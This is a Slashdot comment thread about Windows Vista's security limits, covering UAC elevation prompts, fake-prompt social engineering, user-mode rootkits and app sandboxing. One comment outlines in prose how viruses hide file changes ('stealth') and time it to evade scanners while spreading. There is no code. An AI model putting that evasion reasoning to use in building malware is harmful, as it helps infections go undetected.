sounds kind of like what is called "capability based" program security http://www.skyhunter.com/marcs/capabilityIntro/ind ex.html [skyhunter.com]

Re:Unix-style permissions are not enough. (0)

Anonymous Coward | more than 7 years ago | (#18848513)

Look up the OLPC Project ;)

chroot?. (1)

kybred (795293) | more than 7 years ago | (#18848657)

Basically, what I'm proposing amounts to sandboxing every app. This may seem harsh, but why not do it? What's the advantage of letting any app destroy any of my files? Make them at least beg me for permission first, I say!

Could you set up any app that you wanted to protect your files from with a 'chroot' wrapper? Not really sure if that would work, just asking.

Re:Unix-style permissions are not enough. (1)

TheVoice900 (467327) | more than 7 years ago | (#18848885)

Malware writers are not interested in corrupting your data, what do they have to gain from that? Maybe a small minority who just want to mess with people would actually bother. Real malware is created with the intent of taking over your machine silently and then using it as a zombie to distribute spam, that's where the money is after all.

Why You're Wrong (2, Insightful)

DeadManCoding (961283) | more than 7 years ago | (#18849187)

Let's put this simple. You're right, permissions by user isn't enough. But if we set permissions by app, eventually, Windows users will become accustomed to clicking "Accept" to every app permission that occurs, creating the same state we're in now. Do I read all of the XP pop-ups? Yes, I do, as well as all my Spybot pop-ups, as I don't want a randow BHO installed on my system. Does everyone read those pop-ups? Hell no!!! And that's the reason why I have to clean out my girlfriend's computer on a monthly basis. I can't expect her and children to read every pop-up and understand what's going on. As any sysadmin knows, it comes down to the average user. We can try to educate them as much as possible, but until they do learn, we have to have some permissions-based system so that we can try to keep average users out of their computer enough to stop zombied boxen from happening everywhere. Am I trying to educate my girlfriend? Yes, but it's not a simple process.

Expect ??!?!!? (1)

unity100 (970058) | more than 7 years ago | (#18848325)

Rather make it "look forward to".

see, you cant cram in crapload of control mechanisms (DRM and other shit) that can affect operation of entire computer (and permission wise, at even hardware level too !) and then expect it to be only as vulnerable as previous oses (or any os, in fact) that did not contain that much shit in them.

malware producers, virus makers are going to exploit the hell out of the mechanisms microsoft put in vista.

User Mode Rootkits? (5, Insightful)

WiseWeasel (92224) | more than 7 years ago | (#18848343)

From the summary:
"malware... can still hide with user-mode rootkits"

Did that strike anyone else as odd? User mode rootkits... wouldn't that be "userkits", or just trojans/viruses/malware? If it doesn't have root access, I don't think you can call it a rootkit.

Re:User Mode Rootkits? (1)

SLi (132609) | more than 7 years ago | (#18848411)

You are right. They should call it something else if it doesn't compromise the entire system. That makes it a relatively isolated incident securitywise (not that it wouldn't be serious if they have compromised all your passwords, which I hope are different from your administrator password, bank account logins and credit card numbers).

Re:User Mode Rootkits? (1)

Megane (129182) | more than 7 years ago | (#18848607)

That makes it a relatively isolated incident securitywise (not that it wouldn't be serious if they have compromised all your passwords, which I hope are different from your administrator password, bank account logins and credit card numbers).

The hell with that, all most of them want to do is use your box as a zombie spam/DoS mule. You don't need root (or its Windows equivalent) to do that.

Re:User Mode Rootkits? (1)

QuantumG (50515) | more than 7 years ago | (#18848459)

"rootkit" is often, stupidly, used as a term for what the old school virus writers call "stealth".. intercepting api calls and falsifying the result to hide something.

they usually only do directory stealth.. the most trivial form..

although I suppose there have been a few rootkits that did full stealth.. actually hiding modifications that have been made to a file.

Full stealth comes in two forms:

* remove info to be hidden on open / replace info to be hidden on close; or
* direct updates of the buffers returned from each read.

Obviously "redirection stealth", as the second form is called, is only good for files that are opened read only. It also happens to be the more efficient, and more difficult to get right form. As such, most viruses tend to only do the first.

The hardest part about using stealth in a virus is to decide when it should be turned on and when it should be turned off. Ideally, you only want to turn it off when the user is performing an operation that is part of an infection vector. For example, when they are putting exes into an archive you definitely don't want stealth active.. otherwise the virus won't get copied into the archive. But when they're running their virus scanner, you definitely want stealth to be active.

Of course, none of this is relevant to "root kits" .. the stealth is always active, unless you know how to manually turn it off.

Social engineering (1)

Matt Perry (793115) | more than 7 years ago | (#18848379)

He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'

Your computer is broadcasting an IP address! Click here to download the fix!

Re:Social engineering (1)

vertigoCiel (1070374) | more than 7 years ago | (#18848533)

Pssssh. Just try to hack me. My IP adresss is 127.0.0.1.

Shock horror! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18848435)

Pardon me but aren't social engineering attacks independent of software or hardware? I don't see how that relates in any way to Vista, or any other operating system for that matter.

pfffft.. (5, Funny)

Jose (15075) | more than 7 years ago | (#18848437)

malware tends to only be available for popular OS's! I am sure that Vista will remain safe from such attacks.

So, why weren't they saying this BEFORE release? (5, Insightful)

dpbsmith (263124) | more than 7 years ago | (#18848535)

Funny how it's all happy-talk before release, and it's only afterwards that they start to "lower expectations."

Remind me again, what was supposed to be so good about Vista? Oh, yeah, all the stuff like WinFS that somehow never happened.

And when people pointed that out, the answer was "but the really important thing is security, which Vista does have."

The real role of WinFS (1)

EmbeddedJanitor (597831) | more than 7 years ago | (#18848699)

WinFS and precursors have been promised in all versions of Windows since the early 1990s (except probablyy ME). It seems that WinFS has two main functions

A) A teaser. A compelling "new age in computing" to get some hype going.

B) A feature to cut when projects run late.

Likely, WinFS will make 20 years old without ever shipping.

Re:The real role of WinFS (2, Funny)

inviolet (797804) | more than 7 years ago | (#18849041)

WinFS and precursors have been promised in all versions of Windows since the early 1990s (except probablyy ME). [...]

I'm guessing that Duke Nukem Forever is dependent on some unique feature of the WinFS filesystem...

But the website said to answer yes (5, Informative)

noidentity (188756) | more than 7 years ago | (#18848595)

I was trying to print some online coupons recently and special software had to be installed. On the installation instructions, it said to run the intstaller than answer "yes" to the question it asked (obviously whether it should be allowed to modify system files). What's the use of OS security if users regularly install software which requires admin access? (due to some kind of Digital Restrictions Management scheme of course)

Re:But the website said to answer yes (0)

Anonymous Coward | more than 7 years ago | (#18849795)

What kind of software is needed to print coupons?

I know you are using this as an example, but it sounds like something that you have actually done. Is this in reference to some "special" coupons that can only be printed by certain people, so in effect is a DRM sort of thing, which I am assuming from your mention of DRM.

I'm trying to think of a reason for special software to print coupons on a standard printer (Not a label type printer). I'm trying to think of a person who has successfully printed a few documents before, who would see a need for special software.

If this is a true example, can you give the name of this coupon vendor, as this kind of practice needs to stop. Make their practices public and let's see what happens to them.

In other news... (1)

renegadesx (977007) | more than 7 years ago | (#18848639)

Water is clear! What a shock I didn't see that one comming!

malware controlling apps (1)

zobier (585066) | more than 7 years ago | (#18848821)

Um, if malware can control what apps can do/run then why can't anti-malware or in fact the system itself control what the malware can do/run? In So...

Just a dare, or a double-dog dare? (2, Informative)

bl8n8r (649187) | more than 7 years ago | (#18848925)

And, how would that be pronounced in Russian? Where Vista infects you.. er, I mean where you infect Vista.. er..
http://blogs.zdnet.com/Apple/?p=422 [zdnet.com]

I'm puzzled. (1)

Tibor the Hun (143056) | more than 7 years ago | (#18849449)

How can just clicking on "Allow" escalate priviledges? Wouldn't you need to enter a password of some sort to prove that you do have admin permissions?

Meh (0)

Anonymous Coward | more than 7 years ago | (#18849855)

a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'
That's completely unnecessary. I tested vista for an hour last week, and after the fourth prompt (fifteen minutes in), I was already clicking allow blindly. Sure, if it was my real system I'd have been more careful, but your average user wouldn't be.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?